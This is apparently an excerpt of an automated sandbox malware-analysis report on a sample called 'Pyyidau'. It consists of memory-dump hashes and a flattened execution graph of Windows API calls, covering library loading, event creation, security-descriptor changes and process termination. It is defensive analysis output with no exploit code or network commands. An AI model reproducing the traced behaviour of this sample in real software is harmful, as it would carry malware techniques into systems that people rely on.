                                                                                          • Instruction Fuzzy Hash: 9AE03934D05208EFCB44DFA8D44069DBBF4EB48310F10C4AA9C49A3341D6369A01CF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113968322918.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Offset: 09970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9970000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 48514c69d7ed8a8498931448248553aedd3526e80305f49dacef962eefb5d6bc
                                                                                          • Instruction ID: 7b8ee043b9b3e12da96943740373fced00d5a1e91a60356d6d413cb0592c4068
                                                                                          • Opcode Fuzzy Hash: 48514c69d7ed8a8498931448248553aedd3526e80305f49dacef962eefb5d6bc
                                                                                          • Instruction Fuzzy Hash: CFF05E70A502598FC760DF58D998A9EB7B6FB89308F1080E5A40DA3780CB349D81CF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113968322918.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Offset: 09970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9970000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 385a36515a395063a1fc9b4cf5daf187eb3f3725b45ca72de128d948d297033e
                                                                                          • Instruction ID: cd8a40036b5a010555d625a9998ac5486a5eff34a0fb5aaf71f04ebf5dd87c7e
                                                                                          • Opcode Fuzzy Hash: 385a36515a395063a1fc9b4cf5daf187eb3f3725b45ca72de128d948d297033e
                                                                                          • Instruction Fuzzy Hash: 9BE0C974D04208EFCB54DFA9D441AADBBF4EB89310F10C5A99C58A7345D6359A51DF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113968322918.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Offset: 09970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9970000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 385a36515a395063a1fc9b4cf5daf187eb3f3725b45ca72de128d948d297033e
                                                                                          • Instruction ID: c2685941f766c28813b9123d172d6620c31fe2b3a14b0ea9eb17ff6f30e718ba
                                                                                          • Opcode Fuzzy Hash: 385a36515a395063a1fc9b4cf5daf187eb3f3725b45ca72de128d948d297033e
                                                                                          • Instruction Fuzzy Hash: 93E0C974D04208EFCB44DFA9D44569DBBF5EB98310F10C5AD9858A3381D6359A51DF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 97f20d1449f96ba6c01fc95b3bdb8519f38326ab4c6fd53567d4b397689cc4d8
                                                                                          • Instruction ID: 0ee554cfd9b3fd3f8d9290d73881c01cbd69c49488ae4735de0145376065a816
                                                                                          • Opcode Fuzzy Hash: 97f20d1449f96ba6c01fc95b3bdb8519f38326ab4c6fd53567d4b397689cc4d8
                                                                                          • Instruction Fuzzy Hash: 03E0ED34904208DBCB14DFA4D4419ADBBF5FB45310F10D16ED84563355C6319A51DF54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c1af7f6fe8505bb4e9ab0c1c1b400474575a8e3791cde66e469f93a66d231cd7
                                                                                          • Instruction ID: 278b251ec00ed54e0ee63238ace00dc1bee715c2df354a1557cb50595964cd73
                                                                                          • Opcode Fuzzy Hash: c1af7f6fe8505bb4e9ab0c1c1b400474575a8e3791cde66e469f93a66d231cd7
                                                                                          • Instruction Fuzzy Hash: 97E0E538E04208EFCB54DFA9E5416ACBBF4EB89300F14C5A9D858A3385D635AA02CF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113968322918.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Offset: 09970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9970000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 94e0e6374979b8283a6696d9a8c48975613b4bf65c98f7003304b7244c46eb4b
                                                                                          • Instruction ID: e08541222ff43cd60c06673c3b3fed7e469754e9300c722cbe49513a2197a26f
                                                                                          • Opcode Fuzzy Hash: 94e0e6374979b8283a6696d9a8c48975613b4bf65c98f7003304b7244c46eb4b
                                                                                          • Instruction Fuzzy Hash: 37E0E574E05208EFCB44EFA9D4416ADBBF4EB88310F10C5AE9858A3345D635AA02CF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1e05424c804adfdf20c7185e3691fa3dbd996f60b365bc856722a53b03eec22e
                                                                                          • Instruction ID: 8db4f5e53b43692de912d004833e77ca4faa93d9fe5d1d01d7dd118691e1738d
                                                                                          • Opcode Fuzzy Hash: 1e05424c804adfdf20c7185e3691fa3dbd996f60b365bc856722a53b03eec22e
                                                                                          • Instruction Fuzzy Hash: B3E08674908208EFC704DF94D84196DBBB8EF49310F14C19DDC4467381C631BA51DF94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b1b57822473da10d03436bdc4bfa1ce4f781ece89b6c6db6b23ef8c1a3f91db4
                                                                                          • Instruction ID: d137cdfd0236e6b745fa5368ff5a98156bf9d820acbc496e0c06c03207d989f1
                                                                                          • Opcode Fuzzy Hash: b1b57822473da10d03436bdc4bfa1ce4f781ece89b6c6db6b23ef8c1a3f91db4
                                                                                          • Instruction Fuzzy Hash: 7EE0E634908208EFCB14DF94D54196DBBF9FB45310F10D1A9DC4527345C6316E51DF95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b1b57822473da10d03436bdc4bfa1ce4f781ece89b6c6db6b23ef8c1a3f91db4
                                                                                          • Instruction ID: 5d88a5d55a87ffcf4082554d684d1d9533c8159f2c57763a2cd367b51f6fdff9
                                                                                          • Opcode Fuzzy Hash: b1b57822473da10d03436bdc4bfa1ce4f781ece89b6c6db6b23ef8c1a3f91db4
                                                                                          • Instruction Fuzzy Hash: A3E08C34908208EFCB04DF94E9459ACBBB8EB89310F10C1ADEC4423381D632BE52DF85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 61e9ebe131ae22cab85fc1a18140b97e6a7d2fa02b5b31141afb4f9231c209c6
                                                                                          • Instruction ID: 7684029c5d4c9c477b9bf28b8a7dc2265d54c66b920f4cfb3c35603ba8632be6
                                                                                          • Opcode Fuzzy Hash: 61e9ebe131ae22cab85fc1a18140b97e6a7d2fa02b5b31141afb4f9231c209c6
                                                                                          • Instruction Fuzzy Hash: DBE01A34D04208AFCB14DF99D8456ACBBF8AB89200F10C1A9985853385C6356A01CF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8137e36ae39741db464305917c7afa3e3bff6df7706243035a1a4b44e243b540
                                                                                          • Instruction ID: 02d531f1515fe6ac66b239f97aa15f5997e81f3e4d1085af1f14c1ccc3f5dc8c
                                                                                          • Opcode Fuzzy Hash: 8137e36ae39741db464305917c7afa3e3bff6df7706243035a1a4b44e243b540
                                                                                          • Instruction Fuzzy Hash: CDE0C23005E3804FD72A9BB451193E93FE9AF8B308F018A9AD886C71E2C6381405CF82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113968322918.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Offset: 09970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9970000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ?
                                                                                          • API String ID: 0-1684325040
                                                                                          • Opcode ID: 5548ce85c538cb577cc298ef409e614f8402293811d2e079139c51ed379d0d2a
                                                                                          • Instruction ID: 421aa61f0dce7d6f9c741315628951fad8dc04165344e7dd35d39ac8e9fc2ff5
                                                                                          • Opcode Fuzzy Hash: 5548ce85c538cb577cc298ef409e614f8402293811d2e079139c51ed379d0d2a
                                                                                          • Instruction Fuzzy Hash: D331FB70D046198FEB29CF2AC9587DEFAF6AF89304F00C0FA940DA7245EB7459858F41
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113968322918.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Offset: 09970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9970000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ?
                                                                                          • API String ID: 0-1684325040
                                                                                          • Opcode ID: 3d49da5ef951aab26c686e8124800f62a0d77093b304a9881ce2dcb636cc8dc6
                                                                                          • Instruction ID: 4f04b530bab875f4a0ef3feace724a1f0bf71db2f02a33e1100e798e982a8961
                                                                                          • Opcode Fuzzy Hash: 3d49da5ef951aab26c686e8124800f62a0d77093b304a9881ce2dcb636cc8dc6
                                                                                          • Instruction Fuzzy Hash: 05311B70D097558FD72ACF278C5428ABBF6AF86300F09C1FAC44CAA166DB744986CF51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113950307605.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4ea0000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b3d15ad5d3640eb5039170daeaeba105c8406fad34eb8dc237b31cac6ea7ba6c
                                                                                          • Instruction ID: b2ec7ffbe18a3fcd4151401c4665db09ae65af5a1e2f8b5859f47fb27782c67f
                                                                                          • Opcode Fuzzy Hash: b3d15ad5d3640eb5039170daeaeba105c8406fad34eb8dc237b31cac6ea7ba6c
                                                                                          • Instruction Fuzzy Hash: E39142B1A00248CFDB04CF59C444BEAB7B2EF84304F29D9A6E4069F256D774F991DBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9664437a037e85110d7eadaa3be4e8bec990f8419414c04211c8b68a6502b91
                                                                                          • Instruction ID: b6a3d097bf0d66cffc75c711ea349e4b3095827d85df501aa5521a938b03e806
                                                                                          • Opcode Fuzzy Hash: e9664437a037e85110d7eadaa3be4e8bec990f8419414c04211c8b68a6502b91
                                                                                          • Instruction Fuzzy Hash: 05710970A246099FE70CDF6AE951689BFF2FFC8304F14C439E4459B264EB399846CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8e2fb1b51541de501579c1c703c3cc7e4dff71140a26051033b2d8461ffc7509
                                                                                          • Instruction ID: 034e4203b84a3f93b6e5c4070e21617953491185e64a9b7e6103dada258e0d6e
                                                                                          • Opcode Fuzzy Hash: 8e2fb1b51541de501579c1c703c3cc7e4dff71140a26051033b2d8461ffc7509
                                                                                          • Instruction Fuzzy Hash: 3D710970A24609DFE70CDF6AE951689BFF2FFC8204F14C539E4459B264EF3998468B81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 24ca5303053f1f61107d6f214aa9fb03779642a168093a957a83f1f5f9b1dc54
                                                                                          • Instruction ID: d2b2b30539d7f46ee92519f4d43bc796b2945833fb9d53a4f208efa806747756
                                                                                          • Opcode Fuzzy Hash: 24ca5303053f1f61107d6f214aa9fb03779642a168093a957a83f1f5f9b1dc54
                                                                                          • Instruction Fuzzy Hash: 7651F8B0D052688FDB64CFAAC9447DDBBF6AB89304F0180E9D419AB395D7746E89CF40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de1007b9b33e762028e89650db81e3cae130a791665017f4f49c711ed7f20afc
                                                                                          • Instruction ID: 218268ba4747766e803677811595eac71708b28b4c31f01a4f3d2db72cd0c8c6
                                                                                          • Opcode Fuzzy Hash: de1007b9b33e762028e89650db81e3cae130a791665017f4f49c711ed7f20afc
                                                                                          • Instruction Fuzzy Hash: 9C41F771D052688FDB68CFAAC9447DDBBF6BF89300F11C1A9D459AB294DB346A85CF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e506c9077b028a1ec6ad03501619da24d834f3de41d2cdaf3e78e31e5fb66b2
                                                                                          • Instruction ID: 54fcaeba52c03b45c5d1020296c1dbb62e87761a748635ce5a45001d75f5eb62
                                                                                          • Opcode Fuzzy Hash: 4e506c9077b028a1ec6ad03501619da24d834f3de41d2cdaf3e78e31e5fb66b2
                                                                                          • Instruction Fuzzy Hash: AA3198B5D056188BEB68CF5BD95878EFBF6BFC8304F14C1A9D408A7254DB7419858F01
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.113966378363.0000000009340000.00000040.00000800.00020000.00000000.sdmp, Offset: 09340000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_9340000_Pyyidau.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: db8ae544c504d40269df9860badf74fe6e8bce4b68c9c6a829266b4abd052955
                                                                                          • Instruction ID: 18a8082b753b25f9b4a3375ad3420c218e834962c5557665b2ad6f4d3584722c
                                                                                          • Opcode Fuzzy Hash: db8ae544c504d40269df9860badf74fe6e8bce4b68c9c6a829266b4abd052955
                                                                                          • Instruction Fuzzy Hash: EA3168B1D016188BEB58CF6BD95978EFAF3BFC8304F14C1A9D448A7265DB7409858F01

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.3%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:26.7%
                                                                                          Total number of Nodes:996
                                                                                          Total number of Limit Nodes:27
60414->60298 60415->60303 60416->60306 60417->60317 60418->60323 60419->60306 60420->60330 60421->60382 60422->60322 60423->60330 60424->60328 60425->60337 60426->60344 60427->60330 60428->60346 60429->60351 60430->60344 60431->60371 60432->60350 60433->60365 60434->60361 60435->60377 60436->60374 60437->60382 60438->60380 60439->60377 60440->60359 60441->60347 60442->60382 60443->60278 60444->60290 60445->60302 60446->60296 60447->60302 60448->60390 60449->60392 60450->60408 60454 5f5b1c 60451->60454 60452 5f83dc 65 API calls 60452->60454 60453 5ef7d2 60453->60399 60457 5ef5fb 68 API calls 60453->60457 60454->60452 60454->60453 60455 5f5b3a Sleep 60454->60455 60456 5f5b4f 60455->60456 60456->60453 60456->60454 60457->60399 60458->60398 60462 5d6e10 60459->60462 60461 5da5be 60461->60047 60463 5d6e32 60462->60463 60464 5d7602 60462->60464 60465 5d6f1f GetModuleFileNameW 60463->60465 60472 5d6e67 60463->60472 60466 5d769c 60464->60466 60467 5d76af 60464->60467 60465->60472 60468 5e82b3 5 API calls 60466->60468 60469 5e82b3 5 API calls 60467->60469 60470 5d76ab 60468->60470 60471 5d76c0 60469->60471 60470->60461 60471->60461 60472->60472 60473 5e9583 136 API calls 60472->60473 60474 5d6f71 60473->60474 60474->60464 60492 5d2110 118 API calls 60474->60492 60476 5d6f98 60493 5d1e20 82 API calls 60476->60493 60478 5d6fc0 60489 5d750d 60478->60489 60494 5e83d7 67 API calls 60478->60494 60481 5d6fd4 60481->60489 60495 5d6c20 68 API calls 60481->60495 60483 5d7002 60496 5d1e20 82 API calls 60483->60496 60485 5d7015 60485->60489 60497 5d1e20 82 API calls 60485->60497 60489->60489 60500 5e8c09 102 API calls 60489->60500 60490 5d7044 60490->60489 60491 5e9116 78 API calls 60490->60491 60498 5d6c20 68 API calls 60490->60498 60499 5d1e20 82 API calls 60490->60499 60491->60490 60492->60476 60493->60478 60494->60481 60495->60483 60496->60485 60497->60490 60498->60490 60499->60490 60500->60464 60501->60057 60502->59973 60503 617f20 60504 5b97d0 188 API calls 60503->60504 60505 
617f2d 60504->60505 60506 617f70 60505->60506 60507 617f34 60505->60507 60516 5e85a6 60506->60516 60508 5e9c97 76 API calls 60507->60508 60510 617f69 60508->60510 60513 617f98 LoadLibraryW 60522 5e9c97 60513->60522 60525 5e8548 60516->60525 60519 5e91a1 60520 5e91ca 60519->60520 60521 5e91d6 RaiseException 60519->60521 60520->60521 60521->60513 60532 5e9c5b 76 API calls 60522->60532 60524 5e9ca4 60526 5e8556 60525->60526 60527 5e857b 60525->60527 60528 5e7ca4 66 API calls 60526->60528 60527->60519 60529 5e8568 60528->60529 60529->60527 60531 5f0a68 66 API calls 60529->60531 60531->60527 60532->60524 60533 617f00 60538 5ca250 60533->60538 60536 5e9c97 76 API calls 60537 617f14 60536->60537 60539 5ca27e 60538->60539 60540 5ca288 GetModuleFileNameW 60539->60540 60556 5eab18 60540->60556 60542 5ca2ab 60543 5ca2e0 GetCurrentProcessId wsprintfW CreateEventW 60542->60543 60544 5ca31a GetLastError 60543->60544 60545 5ca473 60543->60545 60544->60545 60546 5ca32b LocalAlloc InitializeSecurityDescriptor SetSecurityDescriptorDacl 60544->60546 60547 5e82b3 5 API calls 60545->60547 60548 5ca370 wsprintfW CreateEventW 60546->60548 60549 5ca482 60547->60549 60550 5ca3cb 60548->60550 60551 5ca3a5 GetLastError 60548->60551 60549->60536 60550->60548 60553 5ca3d9 60550->60553 60554 5ca3db wsprintfW CreateEventW 60550->60554 60551->60550 60552 5ca3b2 CloseHandle 60551->60552 60552->60550 60555 5ca40b 6 API calls 60553->60555 60554->60555 60555->60545 60568 5c5a70 60555->60568 60557 5eab6c 60556->60557 60558 5eab26 60556->60558 60567 5eaab4 77 API calls 60557->60567 60562 5eab41 60558->60562 60565 5ecfc7 66 API calls 60558->60565 60561 5eab32 60566 5ed6b5 11 API calls 60561->60566 60562->60542 60564 5eab3d 60564->60542 60565->60561 60566->60564 60567->60562 60569 5c5a83 60568->60569 60588 5c5120 60569->60588 60572 5c5a93 WaitForMultipleObjects 60573 5c5adc 60572->60573 60574 5c5b4a 60572->60574 60576 5c5ae0 WaitForSingleObject 60573->60576 60575 5c5b95 60574->60575 60577 5c5b82 
60574->60577 60578 5c5b53 Sleep GetCurrentProcess TerminateProcess 60574->60578 60579 5c5af6 60576->60579 60580 5c5b02 ResetEvent 60576->60580 60577->60575 60582 5c5b87 60577->60582 60579->60580 60604 5c55b0 236 API calls 60580->60604 60605 5c55b0 236 API calls 60582->60605 60583 5c5b19 60585 5c5b29 SetEvent WaitForMultipleObjects 60583->60585 60585->60576 60587 5c5b45 60585->60587 60586 5c5b92 60586->60575 60587->60574 60589 5c513c GetCurrentProcess 60588->60589 60590 5c5160 60588->60590 60589->60590 60591 5c514e GetModuleFileNameW 60589->60591 60592 5c522f 60590->60592 60595 5b97d0 188 API calls 60590->60595 60599 5c518e 60590->60599 60591->60590 60593 5e82b3 5 API calls 60592->60593 60594 5c5249 60593->60594 60594->60572 60596 5c5180 60595->60596 60596->60599 60606 5c4760 GetModuleFileNameW 60596->60606 60597 5c51f8 60597->60592 60601 5c521e 60597->60601 60598 5c51c7 WideCharToMultiByte 60598->60597 60599->60597 60599->60598 60602 5e82b3 5 API calls 60601->60602 60603 5c522b 60602->60603 60603->60572 60604->60583 60605->60586 60607 5c47dd 60606->60607 60608 5c47a0 60606->60608 60609 5c47fd GetModuleHandleW GetProcAddress 60607->60609 60610 5c47e3 LoadLibraryW 60607->60610 60608->60607 60617 5c47cf LoadLibraryW 60608->60617 60611 5c481d 60609->60611 60612 5c482b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 60609->60612 60610->60609 60613 5c47f2 LoadLibraryW 60610->60613 60614 5c4857 11 API calls 60611->60614 60612->60614 60613->60609 60615 5e82b3 5 API calls 60614->60615 60616 5c48df 60615->60616 60616->60599 60617->60607 60618 618300 60619 618310 60618->60619 60620 618309 FreeLibrary 60618->60620 60620->60619 60621 5ed366 60659 5edcc0 60621->60659 60623 5ed372 GetStartupInfoW 60624 5ed386 HeapSetInformation 60623->60624 60626 5ed391 60623->60626 60624->60626 60660 5ee97d HeapCreate 60626->60660 60627 5ed3df 60628 5ed3ea 60627->60628 60819 5ed2f6 66 API calls 60627->60819 60661 5f2d4e GetModuleHandleW 60628->60661 60631 5ed3f0 60632 5ed3fb 
60631->60632 60820 5ed2f6 66 API calls 60631->60820 60686 5eda1b GetStartupInfoW 60632->60686 60636 5ed415 GetCommandLineW 60699 5fa6ad GetEnvironmentStringsW 60636->60699 60640 5ed425 60706 5fa5ff GetModuleFileNameW 60640->60706 60643 5ed43a 60712 5fa3be 60643->60712 60646 5ed440 60647 5ed44b 60646->60647 60823 5ecc6b 66 API calls 60646->60823 60726 5eca4a 60647->60726 60650 5ed453 60652 5ed45e 60650->60652 60824 5ecc6b 66 API calls 60650->60824 60732 5dddd0 SetUnhandledExceptionFilter GetModuleFileNameW 60652->60732 60654 5ed480 60655 5ed48e 60654->60655 60816 5ecc21 60654->60816 60825 5ecc4d 66 API calls 60655->60825 60658 5ed493 60659->60623 60660->60627 60662 5f2d6b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 60661->60662 60663 5f2d62 60661->60663 60664 5f2db5 TlsAlloc 60662->60664 60826 5f2a21 70 API calls 60663->60826 60668 5f2ec4 60664->60668 60669 5f2e03 TlsSetValue 60664->60669 60667 5f2d67 60667->60631 60668->60631 60669->60668 60670 5f2e14 60669->60670 60827 5ec976 EncodePointer EncodePointer 60670->60827 60672 5f2e19 EncodePointer EncodePointer EncodePointer EncodePointer 60828 5f9158 InitializeCriticalSectionAndSpinCount 60672->60828 60674 5f2e58 60675 5f2ebf 60674->60675 60676 5f2e5c DecodePointer 60674->60676 60830 5f2a21 70 API calls 60675->60830 60678 5f2e71 60676->60678 60678->60675 60679 5f5b13 66 API calls 60678->60679 60680 5f2e87 60679->60680 60680->60675 60681 5f2e8f DecodePointer 60680->60681 60682 5f2ea0 60681->60682 60682->60675 60683 5f2ea4 60682->60683 60829 5f2a5e 66 API calls 60683->60829 60685 5f2eac GetCurrentThreadId 60685->60668 60687 5f5b13 66 API calls 60686->60687 60698 5eda39 60687->60698 60688 5edbe4 GetStdHandle 60694 5edbae 60688->60694 60689 5f5b13 66 API calls 60689->60698 60690 5edc48 SetHandleCount 60693 5ed409 60690->60693 60691 5edbf6 GetFileType 60691->60694 60692 5edb2e 60692->60694 60695 5edb5a GetFileType 60692->60695 60696 5edb65 InitializeCriticalSectionAndSpinCount 60692->60696 60693->60636 
60821 5ecc6b 66 API calls 60693->60821 60694->60688 60694->60690 60694->60691 60697 5edc1c InitializeCriticalSectionAndSpinCount 60694->60697 60695->60692 60695->60696 60696->60692 60696->60693 60697->60693 60697->60694 60698->60689 60698->60692 60698->60693 60698->60694 60698->60698 60700 5fa6be 60699->60700 60701 5fa6c2 60699->60701 60700->60640 60831 5f5ace 66 API calls 60701->60831 60704 5fa6e4 60705 5fa6eb FreeEnvironmentStringsW 60704->60705 60705->60640 60707 5fa634 60706->60707 60708 5ed42f 60707->60708 60709 5fa671 60707->60709 60708->60643 60822 5ecc6b 66 API calls 60708->60822 60832 5f5ace 66 API calls 60709->60832 60711 5fa677 60711->60708 60714 5fa3d6 60712->60714 60717 5fa3ce 60712->60717 60713 5f5b13 66 API calls 60720 5fa3fa 60713->60720 60714->60713 60715 5fa450 60834 5e79a7 66 API calls 60715->60834 60717->60646 60718 5f5b13 66 API calls 60718->60720 60719 5fa476 60835 5e79a7 66 API calls 60719->60835 60720->60715 60720->60717 60720->60718 60720->60719 60723 5fa48d 60720->60723 60833 5e847c 66 API calls 60720->60833 60836 5ed649 10 API calls 60723->60836 60725 5fa499 60725->60646 60728 5eca58 60726->60728 60837 5f8261 60728->60837 60729 5eca76 60730 5e9c97 76 API calls 60729->60730 60731 5eca97 60729->60731 60730->60731 60731->60650 60733 5dde3a GetLastError 60732->60733 60734 5dde40 60732->60734 60733->60734 60840 5d6080 GetShortPathNameW 60734->60840 60736 5dde4d 60737 5df030 210 API calls 60736->60737 60738 5dde69 60737->60738 60739 5df030 210 API calls 60738->60739 60740 5dde78 GetUserNameW 60739->60740 60741 5aff40 9 API calls 60740->60741 60742 5dde94 60741->60742 60743 5df030 210 API calls 60742->60743 60744 5ddea6 60743->60744 60869 5d5490 LoadLibraryW 60744->60869 60746 5ddeab 60882 5e9cae 60746->60882 60748 5ddecb 60749 5df030 210 API calls 60748->60749 60750 5ddf1c LoadStringW 60749->60750 60751 5da5b0 149 API calls 60750->60751 60752 5ddf44 wsprintfW 60751->60752 60753 5da5b0 149 API calls 60752->60753 60754 5ddf5e 60753->60754 60755 
